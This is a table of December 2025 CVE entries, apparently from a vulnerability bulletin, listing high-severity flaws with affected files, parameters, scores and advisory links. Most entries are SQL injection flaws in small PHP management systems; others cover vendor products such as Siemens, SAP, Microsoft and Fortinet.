| projectworlds--Advanced Library Management System | A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /borrow_book.php. Such manipulation of the argument roll_number leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-12 | 7.3 | CVE-2025-14571 | VDB-336195 \| projectworlds Advanced Library Management System borrow_book.php sql injection VDB-336195 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #704088 \| Projectworlds Library Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/2 |
| itsourcecode--Student Management System | A weakness has been identified in itsourcecode Student Management System 1.0. The affected element is an unknown function of the file /update_account.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-12 | 7.3 | CVE-2025-14578 | VDB-336200 \| itsourcecode Student Management System update_account.php sql injection VDB-336200 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #704794 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/23 https://itsourcecode.com/ |
| campcodes--Online Student Enrollment System | A flaw has been found in campcodes Online Student Enrollment System 1.0. This impacts an unknown function of the file /admin/register.php. Executing manipulation of the argument photo can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-12 | 7.3 | CVE-2025-14583 | VDB-336203 \| campcodes Online Student Enrollment System register.php unrestricted upload VDB-336203 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #705525 \| campcodes Online Student Enrollment System V1.0 Unrestricted Upload https://github.com/CHENCHOUCHOU/vuln/issues/1 https://www.campcodes.com/ |
| itsourcecode--COVID Tracking System | A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-12 | 7.3 | CVE-2025-14584 | VDB-336204 | itsourcecode COVID Tracking System Admin Login login.php sql injection VDB-336204 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705534 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Wegetmore/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--COVID Tracking System | A vulnerability was found in itsourcecode COVID Tracking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/?page=zone. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-12 | 7.3 | CVE-2025-14585 | VDB-336205 \| itsourcecode COVID Tracking System page sql injection VDB-336205 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #705535 \| itsourcecode COVID Tracking System V1.0 SQL Injection Submit #706053 \| itsourcecode COVID Tracking System V1.0 SQL Injection (Duplicate) https://github.com/Ggeee3/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Pet Shop Management System | A vulnerability was identified in itsourcecode Online Pet Shop Management System 1.0. This affects an unknown part of the file /pet1/available.php. Such manipulation of the argument Name leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-12-13 | 7.3 | CVE-2025-14587 | VDB-336207 \| itsourcecode Online Pet Shop Management System available.php sql injection VDB-336207 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #705670 \| itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/tzm113/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /update_program.php. Performing manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-12-13 | 7.3 | CVE-2025-14588 | VDB-336208 \| itsourcecode Student Management System update_program.php sql injection VDB-336208 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707081 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/24 https://itsourcecode.com/ |
| code-projects--Prison Management System | A security vulnerability has been detected in code-projects Prison Management System 2.0. Impacted is an unknown function of the file /admin/search1.php. The manipulation of the argument keyname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-13 | 7.3 | CVE-2025-14590 | VDB-336210 \| code-projects Prison Management System search1.php sql injection VDB-336210 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707096 \| code-projects Prison Management System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL19.md https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was found in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login_query.php. Performing manipulation of the argument stud_no results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-13 | 7.3 | CVE-2025-14619 | VDB-336304 \| code-projects Student File Management System login_query.php sql injection VDB-336304 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707101 \| Code-projects Student File Management System 1.0 SQL Injection Submit #709095 \| Code-projects Student File Management System v1.0 Authentication Bypass by Primary Weakness (Duplicate) https://github.com/jjjjj-zr/jjjjjzr2/issues/2 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was determined in code-projects Student File Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/login_query.php. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-13 | 7.3 | CVE-2025-14620 | VDB-336305 \| code-projects Student File Management System login_query.php sql injection VDB-336305 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707109 \| Code-projects Student File Management System 1.0 SQL Injection Submit #709074 \| Code-projects Student File Management System v1.0 Authentication Bypass by Primary Weakness (Duplicate) https://github.com/jjjjj-zr/jjjjjzr3/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. This affects an unknown part of the file /admin/update_user.php. The manipulation of the argument user_id leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-13 | 7.3 | CVE-2025-14621 | VDB-336306 \| code-projects Student File Management System update_user.php sql injection VDB-336306 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707132 \| Code-projects Student File Management System 1.0 SQL injection https://github.com/jjjjj-zr/jjjjjzr4/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A security flaw has been discovered in code-projects Student File Management System 1.0. This vulnerability affects unknown code of the file /admin/save_user.php. The manipulation of the argument firstname results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-13 | 7.3 | CVE-2025-14622 | VDB-336307 \| code-projects Student File Management System save_user.php sql injection VDB-336307 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707135 \| Code-projects Student File Management System 1.0 SQL injection Submit #709197 \| Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr5/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A weakness has been identified in code-projects Student File Management System 1.0. This issue affects some unknown processing of the file /admin/update_student.php. This manipulation of the argument stud_id causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 7.3 | CVE-2025-14623 | VDB-336308 \| code-projects Student File Management System update_student.php sql injection VDB-336308 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707157 \| Code-projects Student File Management System 1.0 SQL injection Submit #709202 \| Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr6/issues/1 https://code-projects.org/ |
| itsourcecode--Online Pet Shop Management System | A weakness has been identified in itsourcecode Online Pet Shop Management System 1.0. This vulnerability affects unknown code of the file /pet1/addcnp.php. This manipulation of the argument cnpname causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-13 | 7.3 | CVE-2025-14637 | VDB-336362 \| itsourcecode Online Pet Shop Management System addcnp.php sql injection VDB-336362 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707271 \| itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/sec-dreamer/vulpxnPolm/issues/1 https://itsourcecode.com/ |
| itsourcecode--Online Pet Shop Management System | A security vulnerability has been detected in itsourcecode Online Pet Shop Management System 1.0. This issue affects some unknown processing of the file /pet1/update_cnp.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 7.3 | CVE-2025-14638 | VDB-336363 \| itsourcecode Online Pet Shop Management System update_cnp.php sql injection VDB-336363 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #709625 \| itsourcecode Online Pet Shop Management System V1.0 SQL Injection https://github.com/qingdus/temp_cve/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. Impacted is an unknown function of the file /uprec.php. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14639 | VDB-336364 \| itsourcecode Student Management System uprec.php sql injection VDB-336364 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710017 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/25 https://itsourcecode.com/ |
| code-projects--Student File Management System | A flaw has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /admin/save_student.php. Executing manipulation of the argument stud_no can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14640 | VDB-336365 \| code-projects Student File Management System save_student.php sql injection VDB-336365 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710162 \| Code-projects Student File Management System v1.0 SQL Injection Submit #709201 \| Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr14/issues/1 https://code-projects.org/ |
| code-projects--Simple Attendance Record System | A vulnerability was found in code-projects Simple Attendance Record System 2.0. The affected element is an unknown function of the file /check.php. Performing manipulation of the argument student results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-14 | 7.3 | CVE-2025-14643 | VDB-336376 \| code-projects Simple Attendance Record System check.php sql injection VDB-336376 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708236 \| code-projects Simple Attendance Record System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL20.md https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /update_subject.php. Executing manipulation of the argument ID can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 7.3 | CVE-2025-14644 | VDB-336377 \| itsourcecode Student Management System update_subject.php sql injection VDB-336377 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708739 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/Bai-public/CVE/issues/2 https://itsourcecode.com/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. This affects an unknown function of the file /admin/delete_user.php. The manipulation of the argument user_id leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-14 | 7.3 | CVE-2025-14645 | VDB-336378 \| code-projects Student File Management System delete_user.php sql injection VDB-336378 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #709003 \| Code-projects Student File Management System 1.0 SQL Injection Submit #709187 \| Fabian Ros Student File Management System in PHP 1.0 (Released 2025-12-03) SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr7/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A security flaw has been discovered in code-projects Student File Management System 1.0. This impacts an unknown function of the file /admin/delete_student.php. The manipulation of the argument stud_id results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-14 | 7.3 | CVE-2025-14646 | VDB-336379 \| code-projects Student File Management System delete_student.php sql injection VDB-336379 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #709032 \| Code-projects Student File Management System v1.0 SQL Injection Submit #709193 \| Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr8/issues/1 https://code-projects.org/ |
| code-projects--Computer Book Store | A weakness has been identified in code-projects Computer Book Store 1.0. Affected is an unknown function of the file /admin_delete.php. This manipulation of the argument bookisbn causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-14 | 7.3 | CVE-2025-14647 | VDB-336380 \| code-projects Computer Book Store admin_delete.php sql injection VDB-336380 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #709618 \| Code-projects Computer Book Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr11/issues/2 https://code-projects.org/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was detected in itsourcecode Online Cake Ordering System 1.0. Affected by this issue is some unknown functionality of the file /cakeshop/supplier.php. Performing manipulation of the argument supplier results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14649 | VDB-336382 \| itsourcecode Online Cake Ordering System supplier.php sql injection VDB-336382 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710247 \| itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/60 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A flaw has been found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown part of the file /cakeshop/product.php. Executing manipulation of the argument Product can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14650 | VDB-336383 \| itsourcecode Online Cake Ordering System product.php sql injection VDB-336383 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710248 \| itsourcecode Online Cake Ordering System Online Cake Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/61 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This issue affects some unknown processing of the file /admindetail.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-14 | 7.3 | CVE-2025-14652 | VDB-336385 \| itsourcecode Online Cake Ordering System admindetail.php sql injection VDB-336385 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #712648 \| itsourcecode Online Cake Ordering System V1.0 sql https://github.com/moonrains/test/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. Impacted is an unknown function of the file /addrecord.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 7.3 | CVE-2025-14653 | VDB-336386 \| itsourcecode Student Management System addrecord.php sql injection VDB-336386 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #712651 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/moonrains/content/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability has been found in itsourcecode Student Management System 1.0. Affected by this issue is some unknown functionality of the file /advisers.php. Such manipulation of the argument sy leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14661 | VDB-336393 \| itsourcecode Student Management System advisers.php sql injection VDB-336393 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #713742 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/27 https://itsourcecode.com/ |
| Campcodes--Supplier Management System | A vulnerability was identified in Campcodes Supplier Management System 1.0. This issue affects some unknown processing of the file /admin/view_unit.php. The manipulation of the argument chkId[] leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-14 | 7.3 | CVE-2025-14664 | VDB-336396 \| Campcodes Supplier Management System view_unit.php sql injection VDB-336396 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714163 \| Campcodes Supplier Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/3 https://www.campcodes.com/ |
| itsourcecode--COVID Tracking System | A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. This manipulation of the argument Username causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-14 | 7.3 | CVE-2025-14666 | VDB-336398 \| itsourcecode COVID Tracking System page sql injection VDB-336398 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714786 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/bardminx/Lonlydance/issues/2 https://itsourcecode.com/ |
| itsourcecode--COVID Tracking System | A security vulnerability has been detected in itsourcecode COVID Tracking System 1.0. The impacted element is an unknown function of the file /admin/?page=system_info. Such manipulation of the argument meta_value leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 7.3 | CVE-2025-14667 | VDB-336399 \| itsourcecode COVID Tracking System page sql injection VDB-336399 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714805 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/bardminx/Lonlydance/issues/3 https://itsourcecode.com/ |
| campcodes--Advanced Online Examination System | A vulnerability was detected in campcodes Advanced Online Examination System 1.0. This affects an unknown function of the file /query/loginExe.php. Performing manipulation of the argument Username results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14668 | VDB-336400 \| campcodes Advanced Online Examination System loginExe.php sql injection VDB-336400 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714806 \| campcodes Advanced Online Examination System V1.0 SQL Injection https://github.com/gravity123123/CVE/issues/1 https://www.campcodes.com/ |
| gmg137--snap7-rs | A flaw has been found in gmg137 snap7-rs up to 1.142.1. This impacts the function TSnap7MicroClient::opWriteArea of the file s7_micro_client.cpp. Executing manipulation can lead to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14672 | VDB-336401 \| gmg137 snap7-rs s7_micro_client.cpp opWriteArea heap-based overflow VDB-336401 \| CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H8E |
| gmg137--snap7-rs | A vulnerability has been found in gmg137 snap7-rs up to 1.142.1. Affected is the function snap7_rs::client::S7Client::as_ct_write of the file /tests/snap7-rs/src/client.rs. The manipulation leads to heap-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14673 | VDB-336402 \| gmg137 snap7-rs client.rs as_ct_write heap-based overflow VDB-336402 \| CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H74 |
| n/a--Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 | Improper access control for volatile memory containing boot code in Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 could allow an attacker to execute arbitrary code. | 2025-12-10 | 7.6 | CVE-2025-24857 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-343-01 |
| Infinera--MTC-9 | Improper Input Validation vulnerability in Infinera MTC-9 allows remote unauthenticated users to crash the service and cause a reboot of the appliance, thus causing a DoS condition, via crafted XML payloads. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 7.5 | CVE-2025-26488 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-26488 |
| Siemens--COMOS V10.6 | A vulnerability has been identified in COMOS V10.6 (All versions), COMOS V10.6 (All versions), NX V2412 (All versions < V2412.8700), NX V2506 (All versions < V2506.6000), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Solid Edge SE2025 (All versions < V225.0 Update 10), Solid Edge SE2026 (All versions < V226.0 Update 1). The IAM client in affected products is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack. | 2025-12-09 | 7.4 | CVE-2025-40800 | https://cert-portal.siemens.com/productcert/html/ssa-868571.html https://cert-portal.siemens.com/productcert/html/ssa-212953.html |
| Siemens--SIDOOR ATD430W | Affected products do not properly enforce TCP sequence number validation in specific scenarios but accept values within a broad range. This could allow an unauthenticated remote attacker e.g. to interfere with connection setup, potentially leading to a denial of service. The attack succeeds only if an attacker can inject IP packets with spoofed addresses at precisely timed moments, and it affects only TCP-based services. | 2025-12-09 | 7.5 | CVE-2025-40820 | https://cert-portal.siemens.com/productcert/html/ssa-915282.html |
| Siemens--Simcenter Femap | A vulnerability has been identified in Simcenter Femap (All versions < V2512). The affected application contains an uninitialized memory vulnerability while parsing specially crafted SLDPRT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27146) | 2025-12-12 | 7.8 | CVE-2025-40829 | https://cert-portal.siemens.com/productcert/html/ssa-512988.html |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in dyn_conn.php can be used by an unauthenticated remote attacker to trick an authenticated user into sending a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41695 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portCntr2.php can be used by an unauthenticated remote attacker to trick an authenticated user into sending a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41745 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portSecCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user into sending a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41746 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_vlanIntfCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user into sending a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41747 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_Dot1xCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking on a link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41748 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in port_util.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking on a link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41749 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_PortCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking on a link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41750 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portCntr.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking on a link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41751 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portSfp.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking on a link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41752 | https://certvde.com/en/advisories/VDE-2025-071/ |
| SAP_SE--SAP NetWeaver (remote service for Xcelsius) | SAP NetWeaver remote service for Xcelsius allows an attacker with network access and high privileges to execute arbitrary code on the affected system due to insufficient input validation and improper handling of remote method calls. Exploitation does not require user interaction and could lead to service disruption or unauthorized system control. This has high impact on integrity and availability, with no impact on confidentiality. | 2025-12-09 | 7.9 | CVE-2025-42874 | https://me.sap.com/notes/3640185 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4 HANA Private Cloud (Financials General Ledger) | Due to a Missing Authorization Check vulnerability in SAP S/4 HANA Private Cloud (Financials General Ledger), an authenticated attacker with authorization limited to a single company code could read sensitive data and post or modify documents across all company codes. Successful exploitation could result in a high impact to confidentiality and a low impact to integrity, while availability remains unaffected. | 2025-12-09 | 7.1 | CVE-2025-42876 | https://me.sap.com/notes/3672151 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Web Dispatcher, Internet Communication Manager and SAP Content Server | SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application. | 2025-12-09 | 7.5 | CVE-2025-42877 | https://me.sap.com/notes/3677544 https://url.sap/sapsecuritypatchday |
| Dell--Dell Encryption | Dell Encryption, versions prior to 11.12.1, contains an Improper Link Resolution Before File Access ('Link Following') vulnerability. A local malicious user could potentially exploit this vulnerability, leading to elevation of privileges. | 2025-12-09 | 7.3 | CVE-2025-46637 | https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442 |
| Fortinet--FortiSandbox | An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests. | 2025-12-09 | 7 | CVE-2025-53949 | https://fortiguard.fortinet.com/psirt/FG-IR-25-479 |
| Microsoft--Windows 10 Version 1809 | Improper neutralization of special elements used in a command ('command injection') in Windows PowerShell allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-54100 | PowerShell Remote Code Execution Vulnerability |
| Meta--react-server-dom-webpack | A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served. | 2025-12-11 | 7.5 | CVE-2025-55184 | https://www.facebook.com/security/advisories/cve-2025-55184 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |
| Microsoft--Windows 11 Version 25H2 | Out-of-bounds read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-55233 | Windows Projected File System Elevation of Privilege Vulnerability |
| PowerDNS--Recursor | An attacker can trigger the removal of cached records by sending a NOTIFY query over TCP. | 2025-12-09 | 7.5 | CVE-2025-59030 | https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-08.html |
| Microsoft--Windows 10 Version 1809 | Missing authentication for critical function in Windows Storage VSP Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-59516 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Storage VSP Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-59517 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Fortinet--FortiVoice | Multiple Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerabilities [CWE-22] in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specifically crafted HTTP or HTTPS commands. | 2025-12-09 | 7.7 | CVE-2025-60024 | https://fortiguard.fortinet.com/psirt/FG-IR-25-812 |
